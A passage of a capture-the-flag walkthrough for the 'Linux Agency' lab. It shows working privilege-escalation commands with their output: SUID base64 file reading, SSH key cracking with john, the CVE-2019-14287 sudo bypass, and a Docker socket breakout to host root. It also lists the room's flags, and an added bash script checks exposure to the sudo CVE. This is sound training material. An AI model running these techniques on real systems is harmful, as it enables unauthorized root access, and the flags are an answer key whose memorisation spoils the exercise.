penelope@linuxagency:~$ 
penelope{2da1c2e9d2bd0004556ae9e107c1d222}

Question 9 – What is maya’s flag?
- In the directory listing for user penelope above, we can see a base64 binary that is owned by user maya and has the SUID bit set. I used GTFOBins to exploit this binary to read the flag from maya’s home directory.
penelope@linuxagency:~$ ls -la
total 80
drwxr-x--- 3 penelope penelope 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
-rwsr-sr-x 1 maya maya 39096 Jan 12 2021 base64
lrwxrwxrwx 1 penelope penelope 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 penelope penelope 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 penelope penelope 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 penelope penelope 8980 Jan 12 2021 examples.desktop
-r-------- 1 penelope penelope 43 Jan 12 2021 flag.txt
drwx------ 3 penelope penelope 4096 Jan 12 2021 .gnupg
-rw-r--r-- 1 penelope penelope 807 Jan 12 2021 .profile
penelope@linuxagency:~$ LFILE=/home/maya/flag.txt
penelope@linuxagency:~$ ./base64 "$LFILE" | base64 --decode
maya{a66e159374b98f64f89f7c8d458ebb2b}
penelope@linuxagency:~$ 


maya{a66e159374b98f64f89f7c8d458ebb2b}

Question 10 – What is robert’s Passphrase?
- Once we are in maya’s home directory, we can see a file named elusive_targets.txt, which reveals that Robert is illegally hacking into our server and that we can gain access to his account with an old SSH password backup kept in a directory called old_robert_ssh. Peeking into the directory reveals robert’s public and private SSH key pair. I dumped the private key onto the local machine and used ssh2john to convert the file into a format john can crack. Firing up john on it reveals the password: industryweapon



root@ip-10-10-230-84:/opt/john# ./ssh2john.py id_rsa > id_rsa.hash
root@ip-10-10-230-84:/# john --wordlist=/usr/share/wordlists/rockyou.txt /opt/john/id_rsa.hash
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
industryweapon (id_rsa)
1g 0:00:00:16 DONE (2023-06-20 20:46) 0.06093g/s 873960p/s 873960c/s 873960C/s *7¡Vamos!
Session completed.


industryweapon

Question 11 – What is user.txt?
- Once I got robert’s password, I tried to SSH into the server with it, but no luck. Then, from maya’s shell, I checked the available routes and the internal services that are running. There I found that port 2222 is listening on 127.0.0.1 of the machine. I tried to SSH into it and succeeded. Now it was time to claim the user flag, but it was just a troll.
maya@linuxagency:~$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 6144 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 10.10.62.203%eth0:68 0.0.0.0:*
udp UNCONN 4992 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:631 0.0.0.0:*
udp UNCONN 25856 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:59125 0.0.0.0:*
udp UNCONN 0 0 [::]:47368 [::]:*
udp UNCONN 8448 0 [::]:5353 [::]:*
tcp LISTEN 0 128 127.0.0.1:2222 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:80 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:631 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:41791 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 5 [::1]:631 [::]:*
maya@linuxagency:~$ ssh -p 2222 [email protected]
[email protected]'s password:
Last login: Tue Jan 12 17:02:07 2021 from 172.17.0.1
robert@ec96850005d6:~$ ls
robert.txt
robert@ec96850005d6:~$ cat robert.txt
You shall not pass from here!!! I will not allow ICA to take over my world.

- Next I checked whether there was any sudo misconfiguration and found that /bin/bash can be run as any user other than root. I have seen this type of configuration before. So, to cross-check, I downloaded linpeas onto the target machine and fired it up. It found that the sudo version is vulnerable to CVE-2019-14287. With the one-liner, I got the root shell and claimed the user flag there, but root was still hiding somewhere.

robert@ec96850005d6:/tmp$ sudo -u#-1 /bin/bash
root@ec96850005d6:/tmp# id
uid=0(root) gid=1000(robert) groups=1000(robert)
root@ec96850005d6:/tmp# cd /root
root@ec96850005d6:/root# ls
success.txt user.txt
root@ec96850005d6:/root# cat user.txt
user{620fb94d32470e1e9dcf8926481efc96}
root@ec96850005d6:/root# cat success.txt
47 you made it!!!
You have made it, Robert has been taught a lesson not to mess with ICA.
Now, Return to our Agency back with some safe route.
All the previous door's have been closed.
Good Luck Amigo!
root@ec96850005d6:/root#
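
CVE-2019-14287 needs two things at once: a sudo release older than 1.8.28 and a Runas list that grants ALL users while excluding root. The following added example (not code from the room or the original post) checks both; it assumes GNU `sort -V`, and the version string and rule it is run on are constructed, since the page shows neither `sudo -V` nor robert's sudoers line.

```bash
#!/usr/bin/env bash
# Added example: is this host exposed to CVE-2019-14287 (fixed in sudo 1.8.28)?

# sudo_version: read `sudo -V` output on stdin, print the upstream version.
sudo_version() {
    sed -n 's/^Sudo version \([0-9][^ ]*\).*/\1/p' | head -n 1
}

# version_lt A B: true when version A sorts strictly before B (GNU sort -V).
version_lt() {
    [ "$1" != "$2" ] &&
        [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# runas_excludes_root "(ALL, !root)": true when the Runas user list grants
# ALL but negates root by name or by uid, the rule shape the CVE bypasses.
runas_excludes_root() {
    local list
    # Drop an optional ":group" part, then spaces and parentheses.
    list=",$(printf '%s' "${1%%:*}" | tr -d ' \t()'),"
    case $list in *,ALL,*) ;; *) return 1 ;; esac
    case $list in *',!root,'*|*',!#0,'*) return 0 ;; esac
    return 1
}

# exposed VERSION RUNAS: prints a verdict; returns 0 only when both hold.
exposed() {
    if version_lt "$1" "1.8.28" && runas_excludes_root "$2"; then
        echo "EXPOSED sudo=$1 runas=$2"
        return 0
    fi
    echo "ok sudo=$1 runas=$2"
    return 1
}

# Constructed inputs (not taken from the room).
ver=$(printf 'Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n' | sudo_version)
exposed "$ver" "(ALL, !root)" || true
exposed "1.8.31" "(ALL, !root)" || true
```

Distribution packages often backport the fix without changing the upstream version string, so confirm an EXPOSED verdict against the package changelog before acting on it.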

user{620fb94d32470e1e9dcf8926481efc96}

Question 12 – What is root.txt?
- The root flag was harder than leg day at the gym. The hint given talked about some Blue Whale, which I assumed meant Docker. So, I blindly copy-pasted the Docker breakout commands from HackTricks and eventually got the root shell. Moving into the root directory reveals the root flag.
root@ec96850005d6:~# find / -name docker.sock 2>/dev/null
/run/docker.sock
root@ec96850005d6:~# /tmp/docker images #lucky they left this executable in the /tmp dir ;)
REPOSITORY TAG IMAGE ID CREATED SIZE
mangoman latest b5f279024ce0 2 years ago 213MB
root@ec96850005d6:~# /tmp/docker run -it -v /:/host/ mangoman chroot /host/ bash
root@e0c9b28abd75:/# ls
bin cdrom etc home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
boot dev flag.txt initrd.img lib lost+found mnt proc run snap swapfile tmp var
root@e0c9b28abd75:/# cd root/
root@e0c9b28abd75:~# ls
message.txt root.txt
root@e0c9b28abd75:~# cat root.txt
root{62ca2110ce7df377872dd9f0797f8476}
root@e0c9b28abd75:~#

root{62ca2110ce7df377872dd9f0797f8476}

Conclusion:

So that was “Linux Agency” for you. Quite a long read, I must say. Well, let’s sum up the room. We started with initial SSH access on the box. Next, we solved a series of missions and got the flag for the user viktor. The privilege escalation consisted of moving through various users, one at each stage. We tried quite a few techniques and at last broke out of the container to get the root flag and freedom from Big Brother.




